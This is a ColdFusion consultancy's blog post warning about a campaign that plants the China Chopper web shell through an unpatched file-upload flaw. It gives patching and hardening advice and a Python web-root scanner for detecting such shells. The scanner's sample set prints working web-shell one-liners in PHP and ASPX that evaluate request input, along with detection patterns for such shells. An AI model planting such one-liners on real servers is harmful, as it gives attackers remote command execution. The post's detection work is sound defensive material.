TeraTech

The ColdFusion Experts: Develop | Secure | Optimize


No-Nonsense November: Ongoing Security Alert for Legacy Coders

November 15, 2018 By Michaela Light

Contents

  • What is the China Chopper?
  • Effects of the China Chopper
  • Preventing the China Chopper Attack on your Systems
  • Converting Legacy Code to Modern, Vibrant CFML
    • Join the CF Alive revolution

I told you so.

That’s probably the worst thing someone can say to you. Especially when it comes to security.


Many times over, I have preached the importance of staying up to date with the latest security patches and upgrades. This is for one big reason. The bad guys are always one step ahead.

As much as we hate to admit it, it’s true. If they weren’t, every hacker, criminal, or just “generally bad dude” would be out of a job. Yet, we are constantly having to protect ourselves from them. That’s because they stay one step ahead.

But by keeping your ColdFusion servers modern and up to date, you drastically reduce your security risk. Because let’s face it, no system is ever 100% secure.

Right now, a wave of attacks is exploiting a ColdFusion vulnerability that Adobe has already patched. Attackers reverse engineered the September 2018 security update (comparing patched and unpatched files to work out what was fixed) and turned that knowledge against servers that have not applied it. The APT (Advanced Persistent Threat) group behind the campaign is using the flaw to plant the China Chopper web shell, a backdoor that gives them full control of the server.

All ColdFusion 2018, 2016 and 11 servers not patched with the September 11, 2018 security update (Adobe bulletin APSB18-33, which fixed the unrestricted file upload vulnerability CVE-2018-15961) are at risk!

What is the China Chopper?

The China Chopper belongs to a group of threats known as web shells. A web shell is a small script planted on a web server that gives an attacker remote access through ordinary HTTP requests. Once in place, it can run operating-system commands, read, write and upload files, and change permissions, all with the privileges of the web server or ColdFusion service account. China Chopper in particular is tiny on the server side (a one-line script that evaluates whatever arrives in a request parameter) and is driven from a separate client program on the attacker’s machine, which makes the server-side file easy to overlook.

The China Chopper variant was first discovered in 2012. Since then, it has been used the world over to access vulnerable servers, with server-side variants written in each of the languages below:

  • JSP
  • ASP
  • ASPX
  • PHP
  • And that’s right… CFML

The China Chopper is not just limited to Windows either. It has been found running on Linux-based systems as well.

There are many ways an attacker can get this web shell onto your server. Apart from a direct upload through an unprotected upload feature, the usual routes are the application-level weaknesses below, most of which up-to-date patches and a secure configuration close off:

  • XSS (Cross Site Scripting)
  • SQL Injection
  • Exposed Admin Interfaces
  • RFI (Remote File Include) Vulnerabilities
  • LFI (Local File Include) Vulnerabilities
  • File Processing Vulnerabilities
  • Vulnerabilities in Apps and Services

The last item on the list is the root cause of the current campaign: a vulnerability in ColdFusion itself, which Adobe patched in September and which unpatched servers still expose.

Effects of the China Chopper

According to US-CERT (United States Computer Emergency Readiness Team), there are four main reasons attackers would infect your system with the China Chopper.

  1. To harvest and exfiltrate sensitive data and credentials;
  2. To upload additional malware for the potential of creating, for example, a watering hole for infection and scanning of further victims;
  3. To use as a relay point to issue commands to hosts inside the network without direct Internet access;
  4. To use as command-and-control infrastructure, potentially in the form of a bot in a botnet or in support of compromises to additional external networks. This could occur if the adversary intends to maintain long-term persistence.

In short, if your system is infected with the China Chopper (or any other web shell for that matter)… you’re gonna have a bad time.

So, how are you going to stop this from happening?

Preventing the China Chopper Attack on your Systems

It may seem like I’ve overstated this point but… applying security updates as soon as they are released is the number one way to prevent this issue. The easiest way to make sure you never miss one is to use the update mechanism built into the ColdFusion Administrator (Server Update > Settings): have it check for updates automatically and email you when one is available, then install the update promptly. Subscribing to Adobe’s security bulletin announcements gives you the same warning without logging into the Administrator.

Some of you may say… Oh, those updates are so annoying. They just eat up my server’s time… Well, so does having to regain control of your servers after they’ve been compromised through an easily preventable flaw. But sheesh! Aren’t those security updates annoying?

I hope you can detect the sarcasm.

Besides that though, there are a number of best practices you can take to help further secure your systems.

  • Create and implement a least-privileges policy for your servers.
    • Run ColdFusion under a dedicated, low-privilege service account rather than SYSTEM or root. That account should not be able to write to the web root, except to the specific upload directories it needs, and nothing in those upload directories should be executable as a script. This limits what an attacker can do even if they manage to get a file onto the server.
  • Create a Demilitarized Zone (DMZ) between your web apps and your servers.
    • Restrict traffic between the tiers to what the application actually needs and log every interaction; a web server that suddenly opens outbound connections or reaches into the database tier in new ways then stands out.
  • Verify you have established a secure config of all of your web servers.
    • Triple check your permissions, block or disable all unnecessary ports and plugins, and block external access to /CFIDE/administrator and other administrative paths at the web server or firewall.
  • Perform regularly scheduled security scans and follow proper lockdown procedures.
    • This will help you identify problem areas you can secure further before anything terrible happens. Scan your web root for script files you did not deploy and for recently modified files, not only for known vulnerabilities. This best practice is made much easier through the use of CF 2018’s Auto Lockdown feature, which applies the steps of Adobe’s ColdFusion Lockdown Guide for you.

These are just a few best practices you can utilize to help further protect your systems and servers.
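As an added example of the scan in the last bullet (this is not code from this post, from TeraTech or from Adobe), here is a small Python heuristic scanner that walks a web root and flags script files containing a code-execution primitive wired directly to request input, which is the shape of China Chopper’s server-side component. The indicator patterns, the 200-byte “tiny file” threshold and the seven-day “recently modified” window are choices made for this example; the file names and the CFML samples in demo() are hypothetical, while the PHP and ASPX samples are the widely published China Chopper one-liners. Tune the patterns to your own code base to keep false positives down.

```python
"""Heuristic web-shell scan of a web root (added example, not TeraTech's or Adobe's code).

China Chopper's server-side half is a one-line script that evaluates whatever
arrives in a request parameter. The indicators below therefore look for
code-execution primitives fed straight from request input in the languages the
post lists (PHP, ASP/ASPX, JSP, CFML). They are heuristics written for this
example; expect to tune them for your own code base.
"""
import os
import re
import tempfile
import time

SCRIPT_EXTENSIONS = {".php", ".asp", ".aspx", ".jsp", ".cfm", ".cfc"}
TINY_FILE_BYTES = 200   # assumption: a China Chopper server file is far smaller than this
RECENT_DAYS = 7         # assumption: files changed this recently deserve an extra flag

INDICATORS = [
    ("php_eval_request",      re.compile(r"\beval\s*\(\s*@?\$_(POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("asp_eval_request",      re.compile(r"\beval\s*\(\s*Request\b", re.I)),
    ("asp_execute_request",   re.compile(r"\bexecute\s*\(?\s*request\b", re.I)),
    ("jsp_runtime_exec",      re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\(", re.I)),
    ("cfml_evaluate_request", re.compile(r"\bevaluate\s*\(\s*(form|url|cgi)\.", re.I)),
    ("cfml_cfexecute",        re.compile(r"<cfexecute\b", re.I)),
    ("cfml_java_runtime",     re.compile(r"createObject\s*\(\s*['\"]java['\"]\s*,\s*['\"]java\.lang\.Runtime['\"]", re.I)),
    ("base64_then_eval",      re.compile(r"base64_?decode\s*\([^)]*\)[\s\S]{0,60}\beval\s*\(", re.I)),
]


def scan_file(path, now=None):
    """Return a finding dict for one file, or None if nothing suspicious was seen."""
    with open(path, "rb") as fh:
        data = fh.read()
    text = data.decode("utf-8", errors="replace")
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    if not hits:
        return None
    now = time.time() if now is None else now
    if len(data) < TINY_FILE_BYTES:
        hits.append("tiny_file")            # one-liner droppers are characteristically tiny
    if now - os.stat(path).st_mtime < RECENT_DAYS * 86400:
        hits.append("recently_modified")    # a web shell is usually newer than the deployment
    return {"path": path, "size": len(data), "indicators": hits}


def scan_webroot(root, now=None):
    """Walk root and return findings for every script file that trips an indicator."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTENSIONS:
                finding = scan_file(os.path.join(dirpath, name), now)
                if finding:
                    findings.append(finding)
    return sorted(findings, key=lambda f: f["path"])


# Constructed sample web root for the demo. shell.php and admin/cmd.aspx are the
# widely published China Chopper one-liners; the .cfm contents and every file
# name are made up for this example.
SAMPLE_FILES = {
    "shell.php": "<?php @eval($_POST['password']);?>",
    "admin/cmd.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "images/upload.cfm": "<cfset result = evaluate(form.cmd)>",
    "index.cfm": "<cfoutput>Hello #encodeForHTML(form.name)#</cfoutput>",
    "logo.png": "not a script, never scanned",
}


def demo():
    """Write the constructed samples to a temp dir, scan it, and return
    {relative path: indicator list} for the files that were flagged."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE_FILES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return {
            os.path.relpath(f["path"], root).replace(os.sep, "/"): f["indicators"]
            for f in scan_webroot(root)
        }


if __name__ == "__main__":
    for rel, flags in demo().items():
        print(f"{rel}: {', '.join(flags)}")
```

Run it against a real web root with scan_webroot("/path/to/wwwroot") and review every hit by hand: legitimate code does sometimes evaluate request input, but a file you did not deploy, that is a few dozen bytes long and was modified last week, is exactly what this campaign leaves behind. Pair the content scan with a file-integrity baseline of your deployed release so that anything not in the baseline is flagged regardless of its contents.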

For more on best practices, check out our podcast with Nolan Erck, “047 Best Practices Are Best, Except When They’re Not”

Converting Legacy Code to Modern, Vibrant CFML

Along with patching your servers, updating your code is just as important. There may be many reasons why you are still working with outdated CFML.

CFML is dying… Why should I waste my time with it?

False. CFML is more alive than ever! Adobe released its latest version CF 2018 this year. And after speaking with Tridib Roy Chowdhury, numbers have never been better for Adobe. For all you Lucee users out there, great news for you! Swansea Jack aka Lucee 6 was just announced at this year’s CFCamp in Munich! Plus with all the young, fresh faces representing the CF community… it looks like CFML is here to stay. So your “CFML is dying” excuse… yeah right.

It’s so hard to convert legacy code to modern code. Better to use my old code until obsolete.

False. Yeah, just like it’s still better to use those @aol.com accounts and stay on Windows 95. You may laugh, but there are still some out there doing this. It’s becoming easier and easier by the day to convert your legacy code.

In another podcast with Nolan Erck, 059 Migrating legacy CFML to MVC (Model View Controller), he discusses just how easy it is to migrate to MVC. Brad Wood gave a presentation on Day 2 of CFCamp on migrating CFML to MVC via the heavy-hitting yet simple-to-use ColdBox MVC module.

Related: “Easily Moving from Legacy Code Hell to Modern CFML Heaven”

There are plenty of resources available to help you make a change for the better. So… not gonna buy that excuse either.

The old system and code are working just fine… I don’t need any stinking upgrade.

False. I mean burying your excrement in the backyard worked fine too… But thank goodness for flush toilets! There are so many benefits to upgrading your legacy code. Here are just a few:

  • Easier Maintenance
  • Faster Deployments
  • Fewer Bugs
  • More Modern and Responsive Front End

But hey, if you like spending long hours and resources on unnecessary bug repairs… be my guest.

In a nutshell, I can’t tell you how to live your life. But I can give you suggestions on how to make it better, for your CFML experience in particular. This attack was completely avoidable, and yet many users were affected, and the number of newly infected systems grows each day. That says nothing bad about the security of ColdFusion and CFML themselves: the fix was available before this campaign was reported. By keeping your servers patched, following the lockdown guidance, and enlisting the help of third-party tools, you can keep your servers just as secure as any other.

Related:  Podcast with Pete Freitag–020 Secrets of High-Security ColdFusion Code.

Join the CF Alive revolution

Discover how we can all make CF more alive, modern and secure this year. Join other ColdFusion developers and managers in the CF Alive Inner Circle today.

  • Get early access to the CF Alive book and videos
  • Be part of a new movement for improving CF's perception in the world.
  • Contribute to the CF Alive revolution
  • Connect with other CF developers and managers
  • There is no cost to membership.

Filed Under: CFML, China Chopper, ColdFusion 2018, Legacy Code, Modernize ColdFusion, Productivity, Security Tagged With: China Chopper, Security alert
